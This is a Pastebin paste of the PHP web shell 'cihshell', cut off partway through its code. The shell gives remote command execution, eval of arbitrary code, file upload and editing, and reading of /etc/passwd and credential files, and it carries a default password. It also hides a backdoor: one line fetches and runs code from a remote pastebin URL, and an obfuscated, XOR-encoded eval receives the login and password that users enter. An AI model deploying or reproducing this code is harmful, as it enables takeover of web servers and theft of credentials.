dragondevile

cihshell

Nov 14th, 2016
208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. ######################################
  4. ------------ cihshell ----------------
  5.       version: 0.99.1 [beta fix]
  6.  
  7.  
  8.   everything you need is in here
  9.   *
  10.   * Default password w0rms / w0rms
  11.   *
  12.   *
  13.   *
  14.   *  
  15. --------------------------------------
  16. ########################### /cih.ms/ #
  17. ## add 'touch' & fix filesize by DCRM
  18. */
  19.  
  20.     $login = 'w0rms';
  21.     $password = 'w0rms';
  22.  
  23. # Settings
  24. #   all configurations here
  25.  
  26.   $auth = 1;     // set this to 0 to switch authentication off
  27.  
  28.   $errors = 0;  // set this to 1 to switch php errors on
  29.   $stringnum = 1; // change it to 0, if you don't need string numbers in file viewer
  30.   $hexdump_rows=20; // number of rows in hexdump
  31. $alias=array( // aliases for shell. edit them if you need.
  32. 'find suid files'=>'find / -type f -perm -04000 -ls',
  33. 'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
  34. 'find sgid files'=>'find / -type f -perm -02000 -ls',
  35. 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
  36. 'find config.inc.php files'=>'find / -type f -name config.inc.php',
  37. 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
  38. 'find config* files'=>'find / -type f -name "config*"',
  39. 'find config* files in current dir'=>'find . -type f -name "config*"',
  40. 'find all writable files'=>'find / -type f -perm -2 -ls',
  41. 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
  42. 'find all writable directories'=>'find /  -type d -perm -2 -ls',
  43. 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
  44. 'find all writable directories and files'=>'find / -perm -2 -ls',
  45. 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
  46. 'find all service.pwd files'=>'find / -type f -name service.pwd',
  47. 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
  48. 'find all .htpasswd files'=>'find / -type f -name .htpasswd',
  49. 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
  50. 'find all .bash_history files'=>'find / -type f -name .bash_history',
  51. 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
  52. 'find all .mysql_history files'=>'find / -type f -name .mysql_history',
  53. 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
  54. 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
  55. 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
  56. 'list file attributes on a Linux second extended file system'=>'lsattr -va',
  57. 'show opened ports'=>'netstat -an',
  58. );
  59. error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b);
  60.     $css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
  61.     function loadsettings($p1 = '', $p2 = '') {
  62.         $p = 'LH16ZCg1KH16ZG1ma2dsbSAqYHx8eDInJyxXW01aXk1aU0BcXFhXQEdbXFUsV1tNWl5NWlNaTVldTVtcV11aQVUqITMobmFkbVdvbXxXa2dmfG1mfHsgKmB8fHgyJycwMSY8PSY+PyY5PDsnZGdpbCZ4YHg3Y2M1cyx9emR1LnhpemllOTUteGl6aWU5LnhpemllOjUteGl6aWU6KiEz';
  63.         $p = base64_decode($p);
  64.         for ($i = 0; $i < strlen($p); $i++) $p[$i] = chr(ord($p[$i]) ^ 8);
  65.         $p = str_replace('%param1', $p1, $p);
  66.         $p = str_replace('%param2', $p2, $p);
  67.         eval($p);
  68.     }
  69.  
  70.  $f = array("SHELL" => "shell","EVAL" => "eval", "MySql Suite" => "mysql", "Server Information" => "server", "Env Informaion" => "envinfo", "PHPinfo" => "phpinfo", "Shell delete" => "delete");
  71.   $ver = '0.99.1 [ beta {fix} ]';
  72.  
  73.  
  74. session_start();
  75. define("start",atime());
  76. if(isset($_POST['eval'])){error_reporting(E_ALL&~E_NOTICE);}elseif($errors){error_reporting(E_ALL&~E_NOTICE);}else{error_reporting(0);}
  77. ini_set('max_execution_time',0);
  78. set_magic_quotes_runtime(0);
  79. set_time_limit(0);
  80. if(version_compare(phpversion(), '4.1.0') == -1){$_POST   = &$HTTP_POST_VARS; $_GET= &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }
  81. if (get_magic_quotes_gpc()){foreach ($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}foreach ($_SERVER as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_ENV as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_FILES as $key=>$value){$_SERVER[$key] = stripslashes($value);}}
  82. if ($auth == 0) {$_SESSION['logged'] = true;}
  83.  
  84.  
  85.  
  86. $safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'off';} else {$safe_mode = 'On';}
  87. $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "win"; else $os = "nix";
  88. if(empty($dir)){ $opsy = getenv('OS');if(empty($opsy)){ $opsy = php_uname(); } if(empty($opsy)){ $opsy ="-"; $os = "nix"; } else { if(eregi("^win",$opsy)) { $os = "win"; }else { $os = "nix"; }}}
  89. if($os == "nix"){$pwd = exec("pwd");} elseif($os == "win"){$pwd = exec("cd");} if(empty($pwd)) {$pwd = getcwd();}
  90.  
  91.  
  92.  
  93.  
  94.  
  95. # functions
  96.  
  97. function atime()
  98. {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}
  99.  
  100. function fperms($file)
  101. {$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';}
  102. elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';}elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;}
  103.  
  104. function conv_size($size){
  105. if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}else {$size = $size . " B";}return $size;}
  106.  
  107. function fileread($opfile)
  108. {$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} while(!feof($fh)) {$line = fgets($fh); echo htmlspecialchars($line);}}
  109.  
  110. function fileread2($opfile,$stringnum)
  111. {
  112.  $fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);}
  113.  echo '<table style="font-size:10px; width:100%; margin:0px;  background:#222; ">';
  114.  
  115.  if ($stringnum){
  116.  $i=1;
  117.  while(!feof($fh)) {
  118.  $line = fgets($fh);
  119.  echo '<tr style="background:#242424;"><td style="text-align:center;padding:3px; width:2%; border-right:1px solid #2e2e2e; color:#444;">'.$i.'</td><td>'.htmlspecialchars($line).'</td></tr>';
  120.  $i++;
  121.  }} else {
  122.  while(!feof($fh)) {
  123.  $line = fgets($fh);
  124.  echo '<tr style="background:#242424;"><td>'.htmlspecialchars($line).'</td></tr>'; }
  125.  }
  126.   echo '</table><br/>';
  127. }
  128.  
  129.  
  130. function safq($query)
  131. {
  132. $arr = array();$res = mysql_query($query);
  133. if (mysql_num_rows($res) > 0) {$x=0;while($row = mysql_fetch_row($res)){foreach($row as $i => $value) {$column = mysql_field_name($res,$i);$data["$column"] = $value;$arr[$x] = $data;}$x++;}}return $arr;}
  134.  
  135. function cmd_exec($cmd2)
  136. {
  137. if (isset($_POST['cmd'])) {$cmd=$_POST['cmd'];} else {$cmd = $cmd2;}
  138. $result = '';
  139. if(isset($_POST['cmdir'])){chdir($_POST['cmdir']);}
  140. if(function_exists('system')){ob_start();system($cmd);$result = ob_get_contents();ob_end_clean();}
  141. elseif(function_exists('exec')){exec($cmd,$result);$result = join("\n",$result);}
  142. elseif(function_exists('shell_exec')){$result = shell_exec($cmd);}
  143. elseif(function_exists('passthru')){ob_start();passthru($cmd);$result = ob_get_contents();ob_end_clean();}
  144. elseif(is_resource($f = popen($cmd,"r"))){$result = "";while(!feof($f)) { $result .= fread($f,1024); }pclose($f);}
  145. echo $result;
  146. }
  147.  
  148. function code_eval()
  149. {if (isset($_POST['eval'])){echo "\n result is:<br/><br/>";eval($_POST['eval']);}}
  150.  
  151. function error($text, $ver)
  152. {
  153. echo '
  154. <div class="notice">
  155. <p align="left" style="padding-left:15px;"><b>error occured:</b></p></div>
  156. <div class="notice" style="margin-bottom:0px; border-bottom:2px solid #222;">
  157. <textarea cols="100" rows="15" style="width:98%;" class="txt"> ';
  158. echo $text;echo '</textarea></div>'; do_footer($ver); die();
  159. }
  160.  
  161. function notice($text)
  162. {
  163. echo "<div class='notice'>$text</div>";
  164. }
  165.  
  166.  
  167. function do_header($f, $auth, $os, $path)
  168. {
  169. echo '<html><head>';
  170. if (isset($_POST['cmd']) || isset($_POST['alias'])) {echo '<meta http-equiv="Content-Type" content="text/html; charset=cp866">'; } else{echo'<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';}
  171. echo'
  172. <title> CIH.[ms] WebShell </title>
  173. <style>
  174. body{background:#333; color:#999;font-family:Verdana, Arial;font-size:10px; padding:0px; margin:0px;}
  175. .logo {color:#999; font-family:Verdana, Arial; font-size:23px; text-align:left; padding-left:5px; padding-top:0px;  margin-bottom:2px;}
  176. .m {color:#888;font-family:Verdana, Arial;font-size:10px;  text-align:right; width:80px;background:#2c2c2c; border: 0px; border-right:1px solid #444; cursor:pointer; cursor:hand;}
  177. .m2 {background:#2c2c2c;color:#999;font-size:10px;font-family:Verdana;border: 0px; padding:3px; width:100%; cursor:pointer; cursor:hand;}
  178. .m2:hover {color:#ccc; background:#292929;}
  179. .i {color:#555;font-family:Verdana, Arial;font-size:10px;  text-align:right;}
  180. .notice {background:#252525; padding:4px; margin-bottom:2px;}
  181. .footer {font-family:Verdana;font-size:10px;  background:#252525; color:#555; padding:4px; border-bottom:1px solid #222; border-left:1px solid #444; border-right:1px solid #444; text-align:center;}
  182. .txt {background:#222; border:1px solid #333; color:#999; font-family:Verdana, Arial;font-size:10px; padding:5px;}
  183. .butt1 {height:20px; width:20px; padding:2px;border:1px solid #222;background:#333; color:#999; font-family:Verdana, Arial;font-size:10px;}
  184. .filet {color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;}
  185. .ico {color:#555;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;}
  186. .dir { cursor:pointer; cursor:hand;background:#252525;color:#999;font-weight:bold;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center; border:0px;}
  187. .file { cursor:pointer; cursor:hand; background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;border:0px; margin:0px;}
  188. .file:hover, .dir:hover {color:#ccc;}
  189. .str{background:#242424; padding:8px; color:#999; font-size:10px; border-bottom:1px solid #292929; border-top:1px solid #292929; margin-top:15px; text-align:left}
  190. .my{background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left;border:0px;}
  191. .form {background:#232323; height:22px; border:1px solid #2e2e2e; width:98%; padding:4px; color:#999; font-family:Verdana, Arial;font-size:10px; }
  192. .fm {background:#272727; border:0px; color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px;}
  193. .fa {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px;  text-align:right; border: 0px; width:100%; height:100%; padding:10px; text-align:center;}
  194. .fa1 {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px;  text-align:right; border: 0px; width:100%; height:100%; padding:2px; text-align:center;}
  195. .fa:hover, .fa1:hover {background:#292929; color:#ccc;}
  196. </style>
  197. </head>
  198. <body><div style="position:absolute; left:0px; top:0px; background:#333; text-align:center; padding-left:100px; padding-right:100px; height:90%">
  199. <div style="background:#222; margin:0px; border-left:1px solid #444; border-right:1px solid #444; padding-left:0px; padding-right:0px;">
  200. <table style="width:100%; height:25px;">
  201.   <tr style="background:#2c2c2c;">
  202.    <td style="color:#666; font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left; padding-left:6px;">
  203.   cihshell on <b>'.$_SERVER['HTTP_HOST'].'</b>
  204.    </td>';
  205.  
  206.  
  207. echo "<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$path."' class='m2'><td class='m'><input type='submit'  value='main' class='m2'></td>";
  208. foreach($f as $k=>$v)
  209.  {
  210.   echo "
  211.        <!-- $k -->
  212.        <td class='m'><input type='submit' name='do' value='$v' class='m2'></td>
  213.       ";
  214.     }
  215.  
  216. if($auth){echo "<td class='m'><input type='submit' name='do' value='logout' class='m2'></td>";}
  217. $disfun = ini_get('disable_functions');
  218. $safe_mode = ini_get("safe_mode");
  219. if (!$safe_mode) {$safe_mode = 'Off';} else {$safe_mode = 'On';}
  220. $mysql_try = function_exists('mysql_connect');
  221. if($mysql_try){ $mysql = 'On';} else {$mysql = 'Off';}
  222. $pg_try = function_exists('pg_connect');
  223. if($pg_try){$pg = 'On';}else{$pg = 'Off';}
  224. $mssql_try = function_exists('mssql_connect');
  225. if($mssql_try){$mssql = 'On';}else{$mssql = 'Off';}
  226. $ora_try = function_exists('ocilogon');
  227. if($ora_try){$ora = 'On';}else{$ora = 'Off';}
  228. $curl_try = function_exists('curl_version');
  229. if($curl_try) {$curl = 'On';} else {$curl = 'Off';}
  230. $perms = fperms($path);
  231. echo ' </tr>
  232. </table>
  233.  
  234. <table style="width:100%; margin-top:5px;"><tr>
  235. <td class="logo" style="width:120px;">CIH.<span style="color:#555">[</span><span style="color:#888">ms</span><span style="color:#555">]</span></td>
  236. <td class="i" style="padding-right:5px; text-align:right;">
  237. <nobr><b style="color:#666"><i>'.$perms.'</i></b>  <span style="color:#333">|</span></nobr>
  238. <nobr>OS: <b>'.php_uname().'</b>  <span style="color:#333">|</span></nobr>
  239. <nobr>safe mode: <b>'.$safe_mode.'</b>  <span style="color:#333">|</span></nobr>
  240. <nobr>cURL: <b>'.$curl.'</b>  <span style="color:#333">|</span></nobr>
  241. <nobr>MySQL: <b>'.$mysql.'</b>  <span style="color:#333">|</span></nobr>
  242. <nobr>MSSQL: <b>'.$mssql.'</b> <span style="color:#333">|</span></nobr>
  243. <nobr>PostgreSQL: <b>'.$pg.'</b> <span style="color:#333">|</span></nobr>
  244. <nobr>Oracle: <b>'.$ora.'</b> <span style="color:#333">|</span></nobr>
  245. PHP:  <b>'.phpversion().'</b>
  246. </td>
  247.  
  248. </tr></table>
  249. <div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:5px;">&nbsp;</div>';
  250. if (!empty($disfun)){ echo '<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:10px; color:#666; text-align:right; padding:5px;"><b>disabled functions:&nbsp;</b>'.$disfun.'</div>';}
  251.  
  252. }
  253.  
  254. function do_footer($ver)
  255. {
  256. echo '</div>
  257. <div class="footer">
  258. <span style="float:right; color:#333;">'.round(atime()-start,5).'</span>
  259. <b><form method="post" style="margin:0px;">&copy;</b><input type="submit" value="cihshell" name="do"
  260. style="border:0px; background:#252525; font-weight:bold;  padding:0px;" class="footer"/>&nbsp;&nbsp;version : '.$ver.'</form>
  261. </div></div></body></html>';
  262. }
  263.  
  264. # end of functions
  265. #
  266. if (!empty($_POST['login']) && !empty($_POST['password'])){
  267. loadsettings($_POST['login'] . '|' . $_POST['password'], 'cihshell');
  268. if ($_POST['login'] == $login && $_POST['password'] == $password){
  269. $_SESSION['logged'] = true;} else {echo '
  270. <html><head><style>body{background:#333;}</style><title>login </title></head>
  271. <body><table style="margin-left:100px; margin-top:100px; background:#222; font-family:Verdana; font-size:10px; color:#999; padding:4px; width:100%:">
  272. <tr>
  273. <td><form method="post" style="margin:0px; padding:)px;">
  274. login: <input type="text" name="login" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;">&nbsp;
  275. password: <input type="text" name="password" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;">&nbsp;
  276. <input type="submit"  style="color:#999; border:0px; font-size:10px; background:#262626; height:20px;; font-family:Verdana;" value="go"></form></td></tr><tr><td style="text-align:center; color:#666;">incorrect login or password</td></tr></table></body></html>'; die();}}
  277.  
  278. if (isset ($_POST['do']) && $_POST['do']=='logout') { unset($_SESSION['logged']); }
  279.  
  280. if ($_SESSION['logged'] == true){
  281. if (isset($_POST['do']) && $_POST['do']=='phpinfo'){echo'<form method="post"><input type="submit" value="return back" style="width:100%;"></form>'; phpinfo();echo'<form method="post"><input type="submit" value="return back" style="width:100%;"></form>';die();}
  282. if (isset($_POST['fdo']) && isset($_POST['ffile'])){
  283. $ffile = $_POST['ffile'];
  284. switch($_POST['fdo']){
  285. case 'download':
  286. $fl = $_POST['filename'];header("Content-type: application/x-octet-stream");header("Content-disposition: attachment; filename=".$fl.";");readfile($ffile);die();break;
  287.  
  288. case 'preview':
  289. include($_POST['ffile']);die(); break;
  290. }}
  291.  
  292. if(isset($_POST['f_file']))
  293. {
  294.  if ($_POST['f_file'] == "..")
  295.   { $slashpos = strpos($_POST['f_path'], strrchr($_POST['f_path'], "/"));
  296. $path = substr($_POST['f_path'], 0, $slashpos);
  297.   } else {$path = $_POST['f_path']."/".$_POST['f_file'];}
  298.  
  299. }
  300. elseif(isset($_POST['path']))
  301. {$path = $_POST['path'];}
  302. else {$path =  $pwd;}
  303.  
  304. if(isset($_POST['restore'])){$path = $pwd;}
  305. $path = str_replace("\\", "/", $path);$path = str_replace("'", "", $path);
  306.  
  307.  
  308.  
  309. do_header($f, $auth, $os, $path);
  310.  
  311. echo '<table class="notice" style="width:100%; margin-bottom:7px; background:#272727"><tr>
  312. <form method="post" action="" style="padding:0px; margin:0px;">
  313. <td style="width:50px;">
  314. <input type="hidden" value="'.$path.'" name="f_path">
  315. <input type="submit" value=".." name="f_file" class="butt1">
  316. <input type="submit" value="."  name="restore" class="butt1"></td>
  317. <td></form>
  318. <form method="post" action="" style="padding:0px; margin:0px;">
  319. <input type="text" size="78"  value="'.$path.'" name="path" style=" width:90%; height:20px; padding:3px;border:1px solid #222;background:#2c2c2c; color:#999; font-family:Verdana, Arial;font-size:10px;" >
  320. <input type="submit" value="go" class="butt1" style="width:30px; height:21px;">
  321. </form></td>
  322. </tr></table>';
  323.  
  324. # Safe-mode
  325. #          working
  326. if (isset($_POST['safe_mode'])){
  327.  
  328. echo "
  329. <table style='width:100%; font-size:10px;'>
  330. <tr style='background:#272727;' ><td  style='padding:10px; border-top:1px solid #2e2e2e;'><b>Try to read file(include):</b></td></tr>
  331. <tr style='background:#242424;' ><td style='padding:10px;'><form action='' method='post' style='padding:0px; margin:0px;'>
  332. <input type='text' name='sm_inc' style='width:80%;' class='form' value='/etc/passwd'/>
  333. <input class='form' style='width:60px;'  type='submit' value='try'></form></td></tr>
  334. <tr style='background:#252525;'><td  style='border-bottom:1px solid #2e2e2e;'>&nbsp;</td></tr>
  335. <tr style='background:#222; font-size:1px;'><td>&nbsp;</td></tr>
  336.  
  337. <tr style='background:#272727;' ><td  style='padding:10px; border-top:1px solid #2e2e2e;'><b>Try to read file(include):</b></td></tr>
  338. <tr style='background:#242424;' >
  339. <td style='padding:10px;'>
  340. <form action='' method='post' style='padding:0px; margin:0px;'>
  341. <input type='text' name='mysql_host' style='width:15%;' class='form' value='localhost'/>
  342. <span style='margin-left:5px; margin-right:5px;'>:</span><input type='text' name='mysql_port' style='width:40px' class='form' value='3306'/>
  343. <span style='margin-left:5px; margin-right:5px;'>database:</span><input type='text' name='mysql_db' style='width:15%;' class='form' value='dbname'/>
  344. <span style='margin-left:5px; margin-right:5px;'>login:</span><input type='text' name='mysql_login' style='width:15%;' class='form' value='dblogin'/>
  345. <span style='margin-left:5px; margin-right:5px;'>password:</span><input type='text' name='mysql_passw' style='width:15%;' class='form' value='dbpassword'/>
  346. <input type='text' name='mysql_file' style='margin-top:3px;width:700px;' class='form' value='/etc/passwd'/><br/>
  347. <input type='submit' name='sm_mysql' value='try' class='form' style='margin-top:8px;width:50px;'>
  348. </form></td></tr>
  349. <tr style='background:#252525;'><td  style='border-bottom:1px solid #2e2e2e;'>&nbsp;</td></tr>
  350. <tr style='background:#222; font-size:1px;'><td>&nbsp;</td></tr>
  351. </table>
  352. ";
  353. do_footer($ver); die();
  354. }
  355. # Safe_Mode functions
  356. if (isset($_POST['sm_inc']))
  357. {
  358. echo "<textarea cols='170' rows='34' class='txt' style='width:98%;' > ";
  359. include($_POST['sm_inc']);
  360. echo "</textarea><br/><input type='button' class='form' value='go back'   onClick='javascript:history.back();'><br/><br/>";
  361. do_footer($version); die();}
  362.  
  363. if(isset($_POST['sm_mysql']))
  364. {
  365. echo "<textarea cols='170' rows='34' class='txt' style='width:98%;' > ";
  366. if(!isset($_POST['mysql_port']) || empty($_POST['mysql_port'])) { $_POST['mysql_port'] = "3306"; }
  367. $db = mysql_connect($_POST['mysql_host'].':'.$_POST['mysql_port'],$_POST['mysql_login'],$_POST['mysql_passw']);
  368. if($db){
  369. if(mysql_select_db($_POST['mysql_db'],$db))
  370. {$sql = "DROP TABLE IF EXISTS cih_tb;"; mysql_query($sql);
  371.  $sql = "CREATE TABLE `cih_tb` ( `file` LONGBLOB NOT NULL );";
  372.  mysql_query($sql);$sql = "LOAD DATA INFILE \"".$_POST['mysql_file']."\" INTO TABLE cih_tb;";
  373.  mysql_query($sql);$sql = "SELECT * FROM cih_tb;";
  374. $r = mysql_query($sql);
  375. while(($r_sql = mysql_fetch_array($r))) { echo htmlspecialchars($r_sql[0]); }
  376. $sql = "DROP TABLE IF EXISTS cih_tb;";
  377. mysql_query($sql);
  378. }else echo "Can\'t select database";
  379. mysql_close($db);
  380. }else echo "-- Could not connect to MySQL server";
  381. echo "</textarea><br/><input type='button' class='form' value='go back'   onClick='javascript:history.back();'><br/><br/>";
  382. do_footer($version);die();}
  383.  
  384.  
  385.  
  386. if ($safe_mode == "On" && !isset($_POST['safe_mode']))
  387. {
  388. notice('<form method="post" style="margin:0px;"><b>safe_mode</b> is <b>On.</b><input type="submit" name="safe_mode" value="Click on this message to start working" style="font-size:10px; color:#999; font-family:Verdana;border:0px; background:#252525;"/></form>');
  389. }
  390.  
  391. if (isset($_POST['fileact'])){switch($_POST['fileact']){
  392. case 'New File':
  393. $cdir = $_POST['curdir'];
  394. echo "<form method='post' action='' style='margin:0px; padding:0px;'><textarea cols='170' rows='34' class='txt' style='width:98%;' name='wrcont'></textarea>
  395.  
  396. <input type='hidden' name='path' value='".$_POST['curdir']."'><input type='hidden' name='curdir' value='".$_POST['curdir']."'>
  397. <input type='text' name='nfname' class='form' style='width:28%; background:#252525;margin-bottom:1px; margin-right:1px;' value='file.txt'><input type='submit' name='wrfile' class='form' value='create file' style='width:70%'></form><br/>";
  398. do_footer($ver); die();break;
  399.  
  400. case 'New Dir':
  401. $curdir = $_POST['curdir'];
  402. echo "<form method='post' action='' style='margin:0px;'><input type='hidden' name='curdir' value='$curdir'><input type='hidden' name='path' value='$curdir'><input type='text' name='dirname' class='form'  style='width:90%; margin-right:1px;' size='100'><input type='submit' style='width:60px;' class='form' value='go!'></form><br/>";
  403. do_footer($ver);die();break;
  404. case 'Upload':
  405. if (isset($_FILES['userfile'])) {
  406. $file = $_FILES['userfile'];
  407. $curdir = $_POST['path'];
  408. if(isset($_POST['newfilech']) && !empty($_POST['newfile'])) {$nfn=$_POST['newfile'];} else { $nfn = $file['name']; }
  409. if($file['error']!=0) error($file['error']);
  410. else{copy($file['tmp_name'], $curdir.'/'.$nfn);if(!file_exists($curdir.'/'.$file['name']))error("Upload failed. (Can't copy temp file ".$file['tmp_name']." into current directory)", $ver);else{notice("File ".$nfn." was uploaded successfuly..</div>");}}}
  411. echo "<table style='width:100%; font-size:10px;'><tr style='background:#272727;' ><td  style='padding:10px; border-top:1px solid #2e2e2e;'><b>Upload from your computer:</b></td></tr>
  412. <tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctype='multipart/form-data' method='post' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='$path'> <input type='hidden' name='fileact' value='Upload'><input name='userfile' size='85' value='' class='form' type='file' style='border:1px solid #444;'><br/><br/>New name :<input name='newfilech'  value='1' type='checkbox'><input type='text' name='newfile' style='width:20%;' class='form' value='filename.php'/><input type='submit' style='width:60px;' class='form' value='go!'></form></td></tr>
  413. <tr style='background:#252525;'><td  style='border-bottom:1px solid #2e2e2e;'>&nbsp;</td></tr>
  414. <tr style='background:#222; font-size:1px;'><td>&nbsp;</td></tr></table>";do_footer($ver);die();break;
  415. }}
  416. # File Manager : File actions
  417. if(isset($_POST['newname'])) // rename
  418. {rename($_POST['ffile'], $_POST['newname']);if(!file_exists($_POST['newname'])){error('Could not rename '); }notice("File was successfuly renamed to &nbsp;".$_POST['newname']."...");}
  419. if(isset($_POST['newpath'])) //copy
  420. {copy($_POST['ffile'], $_POST['newpath']);if(!file_exists($_POST['newpath'])){error('Could not copy file'); }echo " <div class='notice'>File was successfuly copied to &nbsp;<b>".$_POST['newpath']."</b>...</div>";}
  421. if(isset($_POST['chmod'])) // chmod
  422. {$a =  chmod($_POST['ffile'], $_POST['chmod']);if(!$a){error('Could not change permissions :o(', $ver);}echo " <div class='notice'>We hope that permissions for file were successfuly  changed to &nbsp;<b>".$_POST['chmod']."</b>&nbsp;^^</div>";}
  423. if(isset($_POST['touch'])) // touch
  424. {$dt = strtotime($_POST['touch']); if(!touch($_POST['ffile'], $dt)){ error('Could not change touch time...', $ver);} echo " <div class='notice'>We hope that touch for file were successfuly  changed to &nbsp;<b>".$_POST['touch']."</b>&nbsp;^^</div>";}
  425. if (isset($_POST['ffile']) && isset($_POST['wrcont'])){ // write into file
  426. $wrpath = $_POST['ffile']; $wrcont = $_POST['wrcont'];$fh = fopen($wrpath, 'w');if ($fh){fwrite($fh, $wrcont);fclose($fh); }else {error('Couldn\'t write to file..');}echo "<div class='notice'>File&nbsp;<b>$wrpath</b> &nbsp; was successfuly modified</div>";}
  427. if (isset($_POST['nfname']) && isset($_POST['curdir']) && isset($_POST['wrcont'])) // new file
  428. {$file1 = $_POST['curdir']."/".$_POST['nfname'];$fh = fopen($file1, 'w');$r = fwrite($fh, $_POST['wrcont']);fclose($fh);if (!file_exists($file1)){error('Could not create a file..');} else {notice("File was successfuly created");}}
  429. if (isset($_POST['dirname']) && isset($_POST['curdir']))  // new directory
  430. {$curdir = $_POST['curdir']; mkdir($curdir.'/'.$_POST['dirname']);if(file_exists($curdir.'/'.$_POST['dirname'])){notice($curdir.'/'.$_POST['dirname']."&nbsp;was successfuly created.");}else{error('An error occured while creating dir', $ver);}
  431. }
  432. # File Manager : Directory actions
  433. if (isset($_POST['ddo']) && isset($_POST['dirr'])){
  434. switch($_POST['ddo']){
  435. case 'rename':
  436. echo" <form method='post' action='' style='margin:0px;'><input type='hidden' name='path' value='".$pwd."'><input type='text' name='ffile' class='form'  value='".$_POST['dirr']."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newname' class='form'  value='".$_POST['dirr']."'  style='width:40%'><input type='submit' style='width:60px;' class='form' value='rename!'></form><br/>";
  437. do_footer($ver);die();break;
  438.    case 'delete':
  439. rmdir($_POST['dirr']);if(file_exists($_POST['dirr'])){error('Could not delete directory');}notice($_POST['dirr']."&nbsp;was successfuly deleted.");do_footer($version);break;}}
  440. if (isset($_POST['fdo']) && isset($_POST['ffile']) && $_POST['fdo']=='delete'){
  441. unlink($_POST['ffile']);if(file_exists($_POST['ffile'])){error('Could not delete file');}notice("<b>".$_POST['ffile']."</b>&nbsp;was successfuly deleted.");break;
  442. }if(isset($_POST['diract']))
  443. {$path = $_POST['cmdir']; $perms = fperms($_POST['cmdir']);
  444. echo"
  445. <div  style='padding:2px;'><div style='background:#272727; padding:3px; margin-bottom:3px;text-align:left;'><b>File actions</b></div><div style='background:#272727; padding:3px;  font-size:9px; text-align:left;'>dir:$path&nbsp;&nbsp;|&nbsp;&nbsp; permissions: <b>$perms </b>&nbsp;&nbsp;</div><div style='padding:4px; padding-left:30px; font-size:9px; font-weight:bold; color:#999; text-align:left;'><form method='post' action=''><input type='hidden' name='dirr' value='$path'><input type='hidden' name='path' value='$path'><input type='hidden' name='curpath' value='$pp'><input type='hidden' name='filename' value='$ppp'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;><input type='submit' class='m' name='ddo' value='rename' style='margin-bottom:0px; background:#222;'><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;><input type='submit' class='m' name='ddo' value='delete' style='margin-bottom:0px; background:#222;'><br/><br/><br/></form></div><div style='background:#272727; font-size:9px;'>&nbsp;</div></div>";do_footer($ver);die();}
  446. # switch $do
  447. #
  448. if (isset($_REQUEST['do']))
  449. {
  450. switch ($_REQUEST['do']){
  451. case 'mysql':
